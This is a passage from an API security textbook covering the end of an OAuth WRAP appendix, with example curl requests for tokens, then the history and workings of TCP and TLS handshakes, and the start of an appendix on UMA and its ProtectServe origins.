rich client application. The next step is to exchange this verification code for an access token: \> curl –v –k –X POST –H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" –d "wrap_client_id=0rhQErXIX49svVYoXJGt0DWBuFca& wrap_verification_code=dsadkjljljrrer& wrap_callback=https://mycallback" https://authorization-server/wrap/token APPendix B OAuTH 1.0 354 This cURL command does an HTTP POST to the WRAP token endpoint of the authorization server, with three attributes: wrap_client_id is an identifier for the application, wrap_verification_code is the verification code returned in the previous step, and wrap_callback is the callback URL where the verification code was sent. This returns wrap_access_token, wrap_refresh_token, and wrap_access_token_expires_in parameters. wrap_access_token_expires_in is an optional parameter that indicates the lifetime of wrap_access_token in seconds. When wrap_access_token expires, wrap_refresh_token can be used to get a new access token. Unlike in the Web App Profile, the Rich App Profile doesn’t need to send wrap_client_secret in the access token request. Accessing a WRAP-Protected API All the previous profiles talk about how to get an access token. Once you have the access token, the rest of the flow is independent of the WRAP profile. The following cURL command shows how to access a WRAP-protected resource or an API, and it must happen over TLS: \> curl –H "Authorization: WRAP access_token=cac93e1d29e45bf6d84073dbfb460" https://localhost:8080/recipe WRAP to OAuth 2.0 OAuth WRAP was able to sort out many of the limitations and drawbacks found in OAuth 1.0: primarily, extensibility. OAuth 1.0 is a concrete protocol for identity delegation that has its roots in Flickr Authentication, Google AuthSub, and Yahoo! BBAuth. Another key difference between OAuth 1.0 and WRAP is the dependency on signatures: OAuth WRAP eliminated the need for signatures and mandated using TLS for all types of communications. OAuth 2.0 is a big step forward from OAuth WRAP. It further improved the extensibility features introduced in OAuth WRAP and introduced two major extension points: grant types and token types. APPendix B OAuTH 1.0 355 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_18 APPENDIX C How Transport Layer Security Works? After the exposure of certain secret operations carried out by the National Security Agency (NSA) of the United States, by its former contractor, Edward Snowden, most of the governments, corporations, and even individuals started to think more about security. Edward Snowden is a traitor for some while a whistle-blower for others. The Washington Post newspaper published details from a document revealed by Edward Snowden on October 30, 2013. This was a disturbing news for two Silicon Valley tech giants, Google and Yahoo!. This highly confidential document revealed how NSA intercepted communication links between data centers of Google and Yahoo! to carry out a massive surveillance on its hundreds of millions of users. Further, according to the document, NSA sends millions of records every day from the Yahoo! and Google internal networks to data warehouses at the agency’s headquarters in Fort Meade, Md. After that, field collectors process these data records to extract out metadata, which indicate who sent or received emails and when, as well as the content such as text, audio, and video.1 How is this possible? How come an intruder (in this case, it’s the government) intercepts the communication channels between two data centers and gets access to the data? Even though Google used a secured communication channel from the user’s browser to the Google front-end servers, from there onward, and between the data centers, the communication was in cleartext. As a response to this incident, Google started securing all its communication links between data centers with encryption. Transport Layer Security (TLS) plays a major role in securing data transferred over 1 NSA infiltrates links to Yahoo, Google data centers worldwide, Snowden documents say, www.washingtonpost.com/world/national-security/nsa-infiltrates-links-to-yahoo- google-data-centers-worldwide-snowden-documents-say/2013/10/30/e51d661e-4166-11e3- 8b74-d89d714ca4dd_story.html 356 communication links. In fact, Google is one of the first out of all tech giants to realize the value of TLS. Google made TLS the default setting in Gmail in January 2010 to secure all Gmail communications and four months later introduced an encrypted search service located at https://encrypted.google.com. In October 2011, Google further enhanced its encrypted search and made google.com available on HTTPS, and all Google search queries and the result pages were delivered over HTTPS. HTTPS is in fact the HTTP over TLS. In addition to establishing a protected communication channel between the client and the server, TLS also allows both the parties to identify each other. In the most popular form of TLS, which everyone knows and uses in day-to-day life on the Internet, only the server authenticates to the client—this is also known as one-way TLS. In other words, the client can identify exactly the server it communicates with. This is done by observing and matching the server’s certificate with the server URL, which the user hits on the browser. As we proceed in this appendix, we will further discuss how exactly this is done in detail. In contrast to one-way TLS, mutual authentication identifies both the parties—the client and the server. The client knows exactly the server it communicates with, and the server knows who the client is. The Evolution of Transport Layer Security (TLS) TLS has its roots in SSL (Secure Sockets Layer). Netscape Communications (then Mosaic Communications) introduced SSL in 1994 to build a secured channel between the Netscape browser and the web server it connects to. This was an important need at that time, just prior to the dot-com bubble.2 The SSL 1.0 specification was never released to the public, because it was heavily criticized for the weak cryptographic algorithms that were used. In February 1995, Netscape released the SSL 2.0 specification with many improvements.3 Most of its design was done by Kipp Hickman, with much less participation from the public community. Even though it had its own vulnerabilities, it 2 Dot-com bubble refers to the rapid rise in equity markets fueled by investments in Internet- based companies. During the dot-com bubble of the late 1990s, the value of equity markets grew exponentially, with the technology-dominated Nasdaq index rising from under 1,000 to 5,000 between 1995 and 2000. 3 Adam Shostack, the well-known author of The New School of Information Security, provides an overview of SSL 2.0 at www.homeport.org/~adam/ssl.html Appendix C How TrAnsporT LAyer seCuriTy works? 357 earned the trust and respect of the public as a strong protocol. The very first deployment of SSL 2.0 was in Netscape Navigator 1.1. In late 1995, Ian Goldberg and David Wagner discovered a vulnerability in the random number generation logic in SSL 2.0.4 Mostly due to US export regulations, Netscape had to weaken its encryption scheme to use 40-bit long keys. This limited all possible key combinations to a million million, which were tried by a set of researchers in 30 hours with many spare CPU cycles; they were able to recover the encrypted data. SSL 2.0 was completely under the control of Netscape and was developed with no or minimal inputs from others. This encouraged many other vendors including Microsoft to come up with their own security implementations. As a result, Microsoft developed its own variant of SSL in 1995, called Private Communication Technology (PCT).5 PCT fixed many security vulnerabilities uncovered in SSL 2.0 and simplified the SSL handshake with fewer round trips required in establishing a connection. Among the differences between SSL 2.0 and PCT, the non-encrypted operational mode introduced in PCT was quite prominent. With non-encrypted operational mode, PCT only provides authentication—no data encryption. As discussed before, due to the US export regulation laws, SSL 2.0 had to use weak cryptographic keys for encryption. Even though the regulations did not mandate to use weak cryptographic keys for authentication, SSL 2.0 used the same weak cryptographic keys used for encryption, also for authentication. PCT fixed this limitation in SSL 2.0 by introducing a separate strong key for authentication. Netscape released SSL 3.0 in 1996 having Paul Kocher as the key architect. This was after an attempt to introduce SSL 2.1 as a fix for the SSL 2.0. But it never went pass the draft stage, and Netscape decided it was the time to design everything from ground up. In fact, Netscape hired Paul Kocher to work with its own Phil Karlton and Allan Freier to build SSL 3.0 from scratch. SSL 3.0 introduced a new specification language as well as a new record type and a new data encoding technique, which made it incompatible with the SSL 2.0. It fixed issues in its predecessor, introduced due to MD5 hashing. The new version used a combination of the MD5 and SHA-1 algorithms to build a hybrid hash. SSL 3.0 was the most stable of all. Even some of the issues found in Microsoft PCT were fixed in SSL 3.0, and it further added a set of new features that were not in PCT. In 1996, 4 Ian Goldberg and David Wagner, “Randomness and the Netscape Browser: How Secure Is the World Wide Web?” www.cs.berkeley.edu/~daw/papers/ddj-netscape.html, January 1996. 5 Microsoft proposed PCT to the IETF in October 1995: http://tools.ietf.org/html/draft- benaloh-pct-00. This was later superseded by SSL 3.0 and TLS. Appendix C How TrAnsporT LAyer seCuriTy works? 358 Microsoft came up with a new proposal to merge SSL 3.0 and its own SSL variant PCT 2.0 to build a new standard called Secure Transport Layer Protocol (STLP).6 Due to the interest shown by many vendors in solving the same problem in different ways, in 1996 the IETF initiated the Transport Layer Security working group to standardize all vendor-specific implementations. All the major vendors, including Netscape and Microsoft, met under the chairmanship of Bruce Schneier in a series of IETF meetings to decide the future of TLS. TLS 1.0 (RFC 2246) was the result; it was released by the IETF in January 1999. The differences between TLS 1.0 and SSL 3.0 aren’t dramatic, but they’re significant enough that TLS 1.0 and SSL 3.0 don’t interoperate. TLS 1.0 was quite stable and stayed unchanged for seven years, until 2006. In April 2006, RFC 4346 introduced TLS 1.1, which made few major changes to TLS 1.0. Two years later, RFC 5246 introduced TLS 1.2, and in August 2018, almost 10 years after TLS 1.2, RFC 8446 introduced TLS 1.3. Transmission Control Protocol (TCP) Understanding how Transmission Control Protocol (TCP) works provides a good background to understand how TLS works. TCP is a layer of abstraction of a reliable network running over an unreliable channel. IP (Internet Protocol) provides host-to- host routing and addressing. TCP/IP is collectively known as the Internet Protocol Suite, which was initially proposed by Vint Cerf and Bob Kahn.7 The original proposal became the RFC 675 under the network working group of IETF in December 1974. After a series of refinements, the version 4 of this specification was published as two RFCs: RFC 791 and RFC 793. The former talks about the Internet Protocol (IP), while the latter is about the Transmission Control Protocol (TCP). The TCP/IP protocol suite presents a four-layered model for network communication as shown in Figure C-1. Each layer has its own responsibilities and communicates with each other using a well-defined interface. For example, the Hypertext Transfer Protocol (HTTP) is an application layer protocol, which is transport layer protocol agnostic. HTTP does not care how the packets are transported from one host to another. It can be over TCP or UDP (User Datagram Protocol), which are defined at the transport layer. But 6 Microsoft Strawman Proposal for a Secure Transport Layer Protocol (“STLP”), http://cseweb. ucsd.edu/~bsy/stlp.ps 7 A Protocol for Packet Network Intercommunication, www.cs.princeton.edu/courses/archive/ fall06/cos561/papers/cerf74.pdf Appendix C How TrAnsporT LAyer seCuriTy works? 359 in practice, most of the HTTP traffic goes over TCP. This is mostly due to the inherent characteristics of TCP. During the data transmission, TCP takes care of retransmission of lost data, ordered delivery of packets, congestion control and avoidance, data integrity, and many more. Almost all the HTTP traffic is benefitted from these characteristics of TCP. Neither the TCP nor the UDP takes care of how the Internet layer operates. The Internet Protocol (IP) functions at the Internet layer. Its responsibility is to provide a hardware-independent addressing scheme to the messages pass-through. Finally, it becomes the responsibility of the network access layer to transport the messages via the physical network. The network access layer interacts directly with the physical network and provides an addressing scheme to identify each device the messages pass through. The Ethernet protocol operates at the network access layer. Our discussion from here onward focuses only on TCP, which operates at the transport layer. Any TCP connection bootstraps with a three-way handshake. In other words, TCP is a connection-oriented protocol, and the client has to establish a connection with the server prior to the data transmission. Before the data transmission begins between the client and the server, each party has to exchange with each other a set of parameters. These parameters include the starting packet sequence numbers and many other connection-specific parameters. The client initiates the TCP three- way handshake by sending a TCP packet to the server. This packet is known as the SYN packet. SYN is a flag set in the TCP packet. The SYN packet includes a randomly picked sequence number by the client, the source (client) port number, destination (server) port number, and many other fields as shown in Figure C-2. If you look closely at Figure C-2, you will notice that the source (client) IP address and the destination (server) IP address are outside the TCP packet and are included as part of the IP packet. As discussed before, IP operates at the network layer, and the IP addresses are defined to be hardware independent. Another important field here that requires our attention is the TCP Segment Len field. This field indicates the length of the application data this packet carries. For all the messages sent during the TCP three-way handshake, the value of the TCP Segment Len field will be zero, as no exchange has started yet. Appendix C How TrAnsporT LAyer seCuriTy works? 360 Once the server receives the initial message from the client, it too picks its own random sequence number and passes it back in the response to the client. This packet is known as the SYN ACK packet. The two main characteristics of TCP, error control (recover from lost packets) and ordered delivery, require each TCP packet to be identified uniquely. The exchange of sequence numbers between the client and the server helps to keep that promise. Once the packets are numbered, both sides of the communication channel know which packets get lost during the transmission and duplicate packets and how to order a set of packets, which are delivered in a random order. Figure C-3 shows a sample TCP SYN ACK packet captured by Wireshark. This includes the source (server) port, destination (client) port, server sequence number, and Figure C-2. TCP SYN packet captured by Wireshark, which is an open source packet analyzer Figure C-1. TCP/IP stack: protocol layer Appendix C How TrAnsporT LAyer seCuriTy works? 361 the acknowledgement number. Adding one to the client sequence number found in the SYN packet derives the acknowledgement number. Since we are still in the three-way handshake, the value of the TCP Segment Len field is zero. Figure C-3. TCP SYN ACK packet captured by Wireshark Figure C-4. TCP ACK packet captured by Wireshark To complete the handshake, the client will once again send a TCP packet to the server to acknowledge the SYN ACK packet it received from the server. This is known as the ACK packet. Figure C-4 shows a sample TCP ACK packet captured by Wireshark. This includes the source (client) port, destination (server) port, initial client sequence number + 1 as the new sequence number, and the acknowledgement number. Adding one to the server sequence number found in the SYN ACK packet derives the Appendix C How TrAnsporT LAyer seCuriTy works? 362 acknowledgement number. Since we are still in the three-way handshake, the value of the TCP Segment Len field is zero. Once the handshake is complete, the application data transmission between the client and the server can begin. The client sends the application data packets to the server immediately after it sends the ACK packet. The transport layer gets the application data from the application layer. Figure C-5 is a captured message from Wireshark, which shows the TCP packet corresponding to an HTTP GET request to download an image. The HTTP, which operates at the application layer, takes care of building the HTTP message with all relevant headers and passes it to the TCP at the transport layer. Whatever the data it receives from the application layer, the TCP encapsulates with its own headers and passes it through the rest of the layers in the TCP/IP stack. How TCP derives the sequence number for the first TCP packet, which carries the application data, is explained under the side bar “How does TCP sequence numbering work?” If you look closely at the value of the TCP Segment Len field in Figure C-5, you will notice that it is now set to a nonzero value. Figure C-5. TCP packet corresponding to an HTTP GET request to download an image captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 363 Once the application data transmission between the client and the server begins, the other should acknowledge each data packet sent by either party. As a response to the first TCP packet sent by the client, which carries application data, the server will respond with a TCP ACK packet, as shown in Figure C-6. How TCP derives the sequence number and the acknowledgement number for this TCP ACK packet is explained under the side bar “How does TCP sequence numbering work?” Figure C-6. TCP ACK from the server to the client captured by Wireshark HOW DOES TCP SEQUENCE NUMBERING WORK? whenever either of the two parties at either end of the communication channel wants to send a message to the other, it sends a packet with the ACk flag as an acknowledgement to the last received sequence number from that party. if you look at the very first syn packet (Figure C-2) sent from the client to the server, it does not have an ACk flag, because prior to the syn packet, the client didn’t receive anything from the server. From there onward, every packet sent either by the server or the client has the ACk flag and the Acknowledgement Number field in the TCp packet. in the syn ACk packet (Figure C-3) from the server to the client, the value of the Acknowledgement Number is derived by adding one to the sequence number of the last packet received by the server (from the client). in other words, the Acknowledgement Number field here, from the server to the client, represents the sequence number of the next expected packet. Also if you closely look at the TCp segment Len field in each TCp packet of the three- way handshake, the value of it is set to zero. even though we mentioned before that the Appendix C How TrAnsporT LAyer seCuriTy works? 364 Acknowledgement Number field in syn ACk is derived by adding one to the sequence number found in the syn packet from the client, precisely what happens is the server adds 1 + the value of the TCp segment Len field from the client to the current sequence number to derive the value of the Acknowledgement Number field. The same applies to the ACk packet (Figure C-4) sent from the client to the server. Adding 1 + the value of the TCp segment Len field from the server to the sequence number of the last packet received by the client (from the server) derives the Acknowledgement Number field there. The value of the sequence number in the ACk packet is the same as the value of the Acknowledgement Number in the syn ACk packet from the server. The client starts sending real application data only after the three-way handshake is completed. Figure C-5 shows the first TCp packet, which carries application data from the client to the server. if you look at the sequence number in that TCp packet, it’s the same from the previous packet (ACk packet as shown in Figure C-4) sent from the client to the server. After client sends the ACk packet to the server, it receives nothing from the server. That implies the server still expects a packet with a sequence number, which matches the value of the Acknowledgement Number in the last packet it sent to the client. if you look at Figure C-5, which is the first TCp packet with application data, the value of the TCp segment Len field is set to a nonzero value, and as per Figure C-6, which is the ACk to the first packet with the application data sent by the client, the value of Acknowledgement Number is set correctly to the value of the TCp segment Len field + 1 + the current sequence number from the client. How Transport Layer Security (TLS) Works Transport Layer Security (TLS) protocol can be divided into two phases: the handshake and the data transfer. During the handshake phase, both the client and the server get to know about each other’s cryptographic capabilities and establish cryptographic keys to protect the data transfer. The data transfer happens at the end of the handshake. The data is broken down into a set of records, protected with the cryptographic keys established in the first phase, and transferred between the client and the server. Figure C-7 shows how TLS fits in between other transport and application layer protocols. TLS was initially designed to work on top of a reliable transport protocol like TCP (Transmission Control Protocol). However, TLS is also being used with unreliable transport layer protocols like UDP (User Datagram Protocol). The RFC 6347 defines the Appendix C How TrAnsporT LAyer seCuriTy works? 365 Datagram Transport Layer Security (DTLS) 1.2, which is the TLS equivalent in the UDP world. The DTLS protocol is based on the TLS protocol and provides equivalent security guarantees. This chapter only focuses on TLS. Figure C-7. TLS protocol layers Transport Layer Security (TLS) Handshake Similar to the three-way TCP handshake (see Figure C-8), TLS too introduces its own handshake. The TLS handshake includes three subprotocols: the Handshake protocol, the Change Cipher Spec protocol, and the Alert protocol (see Figure C-7). The Handshake protocol is responsible for building an agreement between the client and the server on cryptographic keys to be used to protect the application data. Both the client and the server use the Change Cipher Spec protocol to indicate to each other that it’s going to switch to a cryptographically secured channel for further communication. The Alert protocol is responsible for generating alerts and communicating them to the parties involved in the TLS connection. For example, if the server certificate the client receives during the TLS handshake is a revoked one, the client generates the certificate_revoked alert. Appendix C How TrAnsporT LAyer seCuriTy works? 366 The TLS handshake happens after the TCP handshake. For the TCP or for the transport layer, everything in the TLS handshake is just application data. Once the TCP handshake is completed, the TLS layer will initiate the TLS handshake. The Client Hello is the first message in the TLS handshake from the client to the server. As you can see in Figure C-9, the sequence number of the TCP packet is 1, as expected, since this is the very first TCP packet, which carries application data. The Client Hello message includes the highest version of the TLS protocol the client supports, a random number generated by the client, cipher suites and the compression algorithm supported by the client, and an optional session identifier (see Figure C-9). The session identifier is used to resume an existing session rather than doing the handshake again from scratch. The TLS handshake is very CPU intensive, but with the support for session resumption, this overhead can be minimized. Figure C-8. TLS handshake Appendix C How TrAnsporT LAyer seCuriTy works? 367 Note TLs session resumption has a direct impact on performance. The master key generation process in the TLs handshake is extremely costly. with session resumption, the same master secret from the previous session is reused. it has been proven through several academic studies that the performance enhancement resulting from TLs session resumption can be up to 20%. session resumption also has a cost, which is mostly handled by servers. each server has to maintain the TLs state of all its clients and also to address high-availability aspects; it needs to replicate this state across different nodes in the cluster. Figure C-9. TLS Client Hello captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 368 One key field in the Client Hello message is the Cipher Suites. Figure C-12 expands the Cipher Suites field of Figure C-10. The Cipher Suites field in the Client Hello message carries all the cryptographic algorithms supported by the client. The message captured in Figure C-12 shows the cryptographic capabilities of the Firefox browser version 43.0.2 (64-bit). A given cipher suite defines the server authentication algorithm, the key exchange algorithm, the bulk encryption algorithm, and the message integrity algorithm. For example, in TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 cipher suite, RSA is the authentication algorithm, ECDHE is the key exchange algorithm, AES_128_GCM is the bulk encryption algorithm, and SHA256 is the message integrity algorithm. Any cipher suite that starts with TLS is only supported by the TLS protocols. As we proceed in this appendix, we will learn the purpose of each algorithm. Once the server receives the Client Hello message from the client, it responds back with the Server Hello message. The Server Hello is the first message from the server to the client. To be precise, the Server Hello is the first message from the server to the client, which is generated at the TLS layer. Prior to that, the TCP layer of the server responds back to the client with a TCP ACK message (see Figure C-11). All TLS layer messages are Figure C-10. TLS Client Hello expanded version captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 369 treated as application data by the TCP layer, and each message will be acknowledged either by the client or the server. From here onward, we will not talk about TCP ACK messages. Figure C-11. TCP ACK message from the server to the client The Server Hello message includes the highest version of TLS protocol that both the client and the server can support, a random number generated by the server, the strongest cipher suite, and the compression algorithm that both the client and the server can support (see Figure C-13). Both parties use the random numbers generated by each other (the client and the server) independently to generate the master secret. This master secret will be used later to derive encryption keys. To generate a session identifier, the server has several options. If no session identifier is included in the Client Hello message, the server generates a new one. Even the client includes one; but if the server can’t resume that session, then once again a new identifier is generated. If the server is capable of resuming the TLS session corresponding to the session identifier specified in the Client Hello message, then the server includes it in the Server Hello message. The server may also decide not to include any session identifiers for any new sessions that it’s not willing to resume in the future. Appendix C How TrAnsporT LAyer seCuriTy works? 370 Note in the history of TLs, several attacks have been reported against the TLs handshake. Cipher suite rollback and version rollback are a couple of them. This could be a result of a man-in-the-middle attack, where the attacker intercepts the TLs handshake and downgrades either the cipher suite or the TLs version, or both. The problem was fixed from ssL 3.0 onward with the introduction of the Change Cipher Spec message. This requires both parties to share the hash of all TLs handshake messages up to the Change Cipher Spec message exactly as each party read them. each has to confirm that they read the messages from each other in the same way. Figure C-12. Cipher suites supported by the TLS client captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 371 After the Server Hello message is sent to the client, the server sends its public certificate, along with other certificates, up to the root certificate authority (CA) in the certificate chain (see Figure C-14). The client must validate these certificates to accept the identity of the server. It uses the public key from the server certificate to encrypt the premaster secret key later. The premaster key is a shared secret between the client and the server to generate the master secret. If the public key in the server certificate isn’t capable of encrypting the premaster secret key, then the TLS protocol mandates another extra step, known as the Server Key Exchange (see Figure C-14). During this step, the server has to create a new key and send it to the client. Later the client will use it to encrypt its premaster secret key. If the server demands TLS mutual authentication, then the next step is for the server to request the client certificate. The client certificate request message from the server includes a list of certificate authorities trusted by the server and the type of the certificate. After the last two optional steps, the server sends the Server Hello Done message to the client (see Figure C-14). This is an empty message that only indicates to the client that the server has completed its initial phase in the handshake. If the server demands the client certificate, now the client sends its public certificate along with all other certificates in the chain up to the root certificate authority (CA) required to validate the client certificate. Next is the Client Key Exchange message, which includes the TLS protocol version as well as the premaster secret key Figure C-13. TLS Server Hello captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 372 (see Figure C-15). The TLS protocol version must be the same as specified in the initial Client Hello message. This is a guard against any rollback attacks to force the server to use an unsecured TLS/SSL version. The premaster secret key included in the message should be encrypted with the server’s public key obtained from the server certificate or with the key passed in the Server Key Exchange message. The Certificate Verify message is the next in line. This is optional and is needed only if the server demands client authentication. The client has to sign the entire set of TLS handshake messages that have taken place so far with its private key and send the signature to the server. The server validates the signature using the client’s public key, which was shared in a previous step. The signature generation process varies depending on which signing algorithm picked during the handshake. If RSA is being used, then the hash of all the previous handshake messages is calculated with both MD5 and SHA-1. Then the concatenated hash is encrypted using the client’s private key. If the signing algorithm picked during the handshake is DSS (Digital Signature Standard), only a SHA- 1 hash is used, and it’s encrypted using the client’s private key. Figure C-14. Certificate, Server Key Exchange, and Server Hello Done captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 373 At this point, the client and the server have exchanged all the required materials to generate the master secret. The master secret is generated using the client random number, the server random number, and the premaster secret. The client now sends the Change Cipher Spec message to the server to indicate that all messages generated from here onward are protected with the keys already established (see Figure C-15). The Finished message is the last one from the client to the server. It’s the hash of the complete message flow in the TLS handshake encrypted by the already established keys. Once the server receives the Finished message from the client, it responds back with the Change Cipher Spec message (see Figure C-16). This indicates to the client that the server is ready to start communicating with the secret keys already established. Finally, the server will send the Finished message to the client. This is similar to the Finished message generated by the client and includes the hash of the complete message flow in the handshake encrypted by the generated cryptographic keys. This completes the TLS handshake, and here onward both the client and the server can send data over an encrypted channel. Figure C-15. Client Key Exchange and Change Cipher Spec captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 374 TLS VS. HTTPS HTTp operates at the application layer of the TCp/ip stack, while the TLs operates between the application layer and the transport layer (see Figure C-1). The agent (e.g., the browser) acting as the HTTp client should also act as the TLs client to initiate the TLs handshake, by opening a connection to a specific port (default 443) at the server. only after the TLs handshake is completed, the agent should initiate the application data exchange. All HTTp data are sent as TLs application data. HTTp over TLs was initially defined by the rFC 2818, under the ieTF network working group. The rFC 2818 further defines a uri format for HTTp over TLs traffic, to differentiate it from plain HTTp traffic. HTTp over TLs is differentiated from HTTp uris by using the https protocol identifier in place of the http protocol identifier. The rFC 2818 was later updated by two rFCs: rFC 5785 and rFC 7230. Application Data Transfer After the TLS handshake phase is complete, sensitive application data can be exchanged between the client and the server using the TLS Record protocol (Figure C-18). This protocol is responsible for breaking all outgoing messages into blocks and assembling all incoming messages. Each outgoing block is compressed; Message Authentication Code (MAC) is calculated and encrypted. Each incoming block is decrypted, decompressed, Figure C-16. Server Change Cipher Spec captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 375 and MAC verified. Figure C-17 summarizes all the key messages exchanged in the TLS handshake. Figure C-17. TLS handshake During the TLS handshake, each side derives a master secret using the client- generated random key, the server-generated random key, and the client-generated premaster secret. All these three keys are shared between each other during the TLS handshake. The master secret is never transferred over the wire. Using the master secret, each side generates four more keys. The client uses the first key to calculate the MAC for each outgoing message. The server uses the same key to validate the MAC of all incoming messages from the client. The server uses the second key to calculate the MAC for each outgoing message. The client uses the same key to validate the MAC of all incoming messages from the server. The client uses the third key to encrypt outgoing messages, and the server uses the same key to decrypt all incoming messages. The server uses the fourth key to encrypt outgoing messages, and the client uses the same key to decrypt all incoming messages. Appendix C How TrAnsporT LAyer seCuriTy works? 376 REVERSE-ENGINEERING TLS For each session, TLs creates a master secret and derives four keys from it for hashing and encryption. what if the private key of the server leaked out? if all the data transferred between clients and the server is being recorded, can it be decrypted? yes, it can. if the TLs handshake is recorded, you can decrypt the premaster secret if you know the server’s private key. Then, using the client-generated random number and the server-generated random number, you can derive the master secret—and then the other four keys. using these keys, you can decrypt the entire set of recorded conversations. using perfect forward secrecy (pFs) can prevent this. with pFs, just as in TLs, a session key is generated, but the session key can’t later be derived back from the server’s master secret. This eliminates the risk of losing the confidentiality of the data if a private key leaks out. To add support for pFs, both the server and the client participating in the TLs handshake should support a cipher suite with ephemeral diffie-Hellman (dHe) or the elliptic-curve variant (eCdHe). Note Google enabled forward secrecy for Gmail, Google+, and search in november 2011. Figure C-18. Server Change Cipher Spec captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 377 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_19 APPENDIX D UMA Evolution User-Managed Access (UMA, pronounced “OOH-mah”) is an OAuth 2.0 profile. OAuth 2.0 decouples the resource server from the authorization server. UMA takes one step forward: it lets you control a distributed set of resource servers from a centralized authorization server. It also enables the resource owner to define a set of policies at the authorization server, which can be evaluated at the time a client is granted access to a protected resource. This eliminates the need for the resource owner’s presence to approve access requests from arbitrary clients or requesting parties. The authorization server can make the decision based on the policies defined by the resource owner. ProtectServe UMA has its roots in the Kantara Initiative. The Kantara Initiative is a nonprofit professional association focused on building digital identity management standards. The first meeting of the UMA working group was held on August 6, 2009. There were two driving forces behind UMA: ProtectServe and vendor relationship management (VRM). ProtectServe is a standard that was heavily influenced by VRM. The goal of ProtectServe was to build a permission-based data-sharing model that was simple, secure, efficient, RESTful, powerful, OAuth-based, and system identity agnostic. ProtectServe defines four parties in its protocol flow: the user, the authorization manager, the service provider, and the consumer. The service provider (SP) manages the user’s resources and exposes them to the rest of the world. The authorization manager (AM) keeps track of all service providers associated with a given user. The user is the resource owner, who introduces all the service providers (or the applications he or she works with) to the authorization manager and builds access control policies that define the basis on which to share resources with others. The consumer consumes the user’s resources via the SP. Before consuming any services or resources, the consumer must request an access grant from the AM. 378 The requested access grant is evaluated against the policies defined on the associated service by its owner, at the AM. ProtectServe uses OAuth 1.0 (see Appendix B) as the protocol for access delegation. The steps in the ProtectServe protocol flow are as follows: Step 1: The user or the resource owner introduces the SP to the AM (see Figure D-1). 1. The user provides the metadata URL of the AM to the SP. 2. The SP talks to the metadata endpoint of the AM and gets details related to the consumer key issuer, the request token issuer, the access token issuer, and the associated policies (OAuth 1.0 specification defines consumer key, request token, and access token). 3. The SP initiates an OAuth 1.0 flow by requesting an OAuth request token from the request token issuer (which could be the same AM). 4. The AM generates an authorization request token and sends it back to the SP along with other parameters defined under OAuth 1.0 specification. 5. The SP redirects the user to the AM with a token reference along with other parameters defined under OAuth 1.0 specification, to get it authorized. 6. Once authorized by the user, the authorization manager returns the authorized request token along with other parameters defined under OAuth 1.0 specification to the SP. 7. To complete the OAuth 1.0 flow, the SP exchanges the authorized request token for an access token, with the AM. 8. Once the OAuth flow is completed, the SP talks to the AM endpoint (which is secured with OAuth 1.0) to get an SP handle. 9. The AM validates the OAuth signature and, once verified, issues an SP handle to the SP. An SP handle is a unique identifier generated by the AM to identify the SP in future communications. That completes the initial step in the ProtectServe protocol flow. Appendix d UMA evolUtion 379 Note the service provider handle is a key that uniquely identifies the service provider at the authorization manager. this information is publicly available. A given service provider can have multiple service provider handles—one for each associated authorization manager. Step 2: Each consumer who wants to get access to protected resources must be provisioned with corresponding consumer keys: 1. The consumer tries to access a protected resource hosted in an SP. 2. The SP detects the unauthenticated access attempt and returns an HTTP 401 status code with required details to get the SP metadata (see Figure D-2). Figure D-1. The service provider bootstraps trust with the authorization manager Appendix d UMA evolUtion 380 3. With the details in the 401 response, the consumer talks to the SP’s metadata endpoint (see Figure D-2). 4. The SP metadata endpoint returns the SP handle (which is registered at the AM) and the corresponding AM endpoint. 5. The consumer talks to the AM endpoint to obtain a consumer key and a consumer secret (see Figure D-3). 6. The consumer requests an access token from the AM, with its consumer key and the SP handle. The request must be digitally signed by the corresponding consumer secret. 7. The AM validates the parameters in the access token request and issues an access token and a token secret to the consumer. Figure D-2. The consumer is rejected by the service provider with a 401 response. R1 represents a resource Appendix d UMA evolUtion 381 Figure D-3. The consumer gets an access token from the authorization manager Step 3: A consumer with a valid access token can access the protected resource hosted in the SP (see Figure D-4): 1. The consumer tries to access the protected resource in the SP with its access token, signed with the access token secret. 2. The SP talks to the AM and gets the secret key corresponding to the consumer’s access token. If required, the SP can store it locally. 3. The SP validates the signature of the request using the access token secret. 4. If the signature is valid, the SP talks to the policy decision endpoint of the AM, passing the access token and the SP handle. The request must be digitally signed by the corresponding access token secret. 5. The AM first validates the request, next evaluates the corresponding policies set by the user or the resource owner, and then sends the decision to the SP. 6. If the decision is a Deny, the location of the terms is returned to the SP, and the SP returns the location to the consumer with a 403 HTTP status code. Appendix d UMA evolUtion 382 7. The consumer requests the terms by talking to the terms endpoint hosted in the AM. The request includes the consumer key, signed with the consumer secret. 8. When the consumer receives the terms, it evaluates them and talks to the AM with additional information to prove its legitimacy. This request includes the consumer key and is signed with the consumer secret. 9. The AM evaluates the additional information and claims provided by the consumer. If those meet the required criteria, the AM creates an agreement resource and sends the location of the agreement resource to the consumer. 10. If this requires the user’s consent, the AM must send it for the user’s approval before sending the location of the agreement resource. 11. Once the consumer receives the location of the agreement resource, it can talk to the corresponding endpoint hosted in the AM and get the agreement resource to see the status. Figure D-4. The consumer accesses a resource hosted at the service provider with valid OAuth credentials, but with limited privileges Appendix d UMA evolUtion 383 Step 4: Once approved by the authorization manager, the consumer can access the protected resource with its access token and the corresponding secret key (see Figure D-5): 1. The consumer tries to access the protected resource at the SP with its access token, signed with the access token secret. 2. The SP talks to the AM and gets the secret key corresponding to the consumer’s access token. If required, the SP can store it locally. 3. The SP validates the signature of the request using the access token secret. 4. If the signature is valid, the SP talks to the policy decision endpoint of the AM, passing the access token and SP handle, signed with the corresponding access token secret. 5. The AM first validates the request, next evaluates the corresponding policies set by the user or the resource owner, and then sends the decision to the SP. 6. If the decision is an Allow from the AM, the SP returns 